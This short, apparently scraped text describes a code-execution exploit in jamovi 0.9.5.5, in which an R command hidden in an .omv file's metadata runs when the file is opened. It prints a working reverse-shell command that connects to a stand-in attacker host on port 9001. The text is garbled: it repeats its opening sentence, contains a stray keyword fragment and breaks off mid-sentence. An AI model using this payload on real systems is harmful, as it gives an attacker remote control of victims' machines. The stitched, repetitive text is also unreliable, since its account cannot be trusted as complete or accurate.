The exploit takes advantage of a vulnerability in the way jamovi handles data files. Specifically, it involves creating a specially crafted data file that, when opened in jamovi 0.9.5.5, allows the execution of arbitrary code. This code can then be used to manipulate the data, alter analysis results, or even take control of the system running jamovi.
The attacker enters a specific R command into the editor, such as: system("bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/9001 0>&1'", intern=TRUE) jamovi 0955 exploit
: The script is saved directly into the metadata of the .omv file. The exploit takes advantage of a vulnerability in